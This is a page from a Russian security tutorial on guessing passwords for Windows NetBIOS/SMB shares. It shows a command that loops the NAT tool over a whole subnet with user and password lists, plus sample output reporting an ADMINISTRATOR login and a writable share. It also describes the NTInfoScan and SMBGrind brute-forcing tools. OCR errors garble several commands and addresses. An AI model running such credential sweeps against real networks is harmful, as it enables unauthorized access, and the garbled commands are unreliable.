Иллюстрированный самоучитель по Secure Web

         

Obtaining list of remote NetBIOS



D:\>FOR /L %i IN (1,1,254) DO nat -u
userlist.txt -p passlist.txt

"92.163.202.»! » nat_output.txt

[*]--- Checking host: 192.168.202.1

[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with Username:
'ADMINISTRATOR'Password:

'ADMINISTRATOR'

[*]--- Attempting to connect with Username:
'ADMINISTRATOR'Password:

'GUEST'

...

[*]--- CONNECTED: Username:
'ADMINISTRATOR' Password:

'PASSWORD'

[*]--- Attempting to access share:
\\*SMBSERVER\TEMP

[*]-—- WARNING: Able to access share:
\\*SM3SERVER\TEMP

[*]--- Checking write access in:
\\*SMBSERVER\TEMP

[*]--- WARNING: Directory is writeable:
\\*SM3SERVER\TEMP

[*]--- Attempting to exercise ..
bug on: \\*SMBSERVER\TEMP

Еще одним хорошим инструментом обнаружения паролей является утилита NTInfoScan (NT'S) Дэвида Литчфилда (David Litchfield), который известен также под псевдонимом Mnemonix. Эту утилиту можно найти по адресу http://packetstorm.stcurify.com/NT/audit/. NTIS — это простая утилита командной строки, которая выполняет проверку по протоколам Internet и NetBIOS, а результат выводит в файл HTML-формат. Она также осуществляет все необходимые операции по инвентаризации пользователи ;г в конце отчета помещает учетные записи с пустым паролем. В настоящее время утилита NTFS обновлена и распространяется новой компанией Дэвида, Cerberus Information Security. Теперь эта утилита называется Cerberus Internet Scanner (CIS) и снабжена графическим интерфейсом.

Все упомянутые выше утилиты распространяются бесплатно и, в общем, прекрасно справляются с возложенной на них задачей. Если же вам нужны дополнительные возможности, предоставляемые коммерческими пакетами, рекомендуем обратить внимание на пакет CyberCop Scanner от компании Network Associates Inc. (NAI). в состав которого входит утилита SMBGrind. Эта утилита отличается поразительной скоростью работы, поскольку она одновременно запускает сразу несколько процессов подбора пароля. Во всем остальном она практически не отличается от утилиты NAT. Ниже приведен пример результатов работы утилиты SMBGrind. Параметр -1 определяет количество одновременных соединений, т.е. количество параллельно запускаемых процессов.

Содержание  Назад  Вперед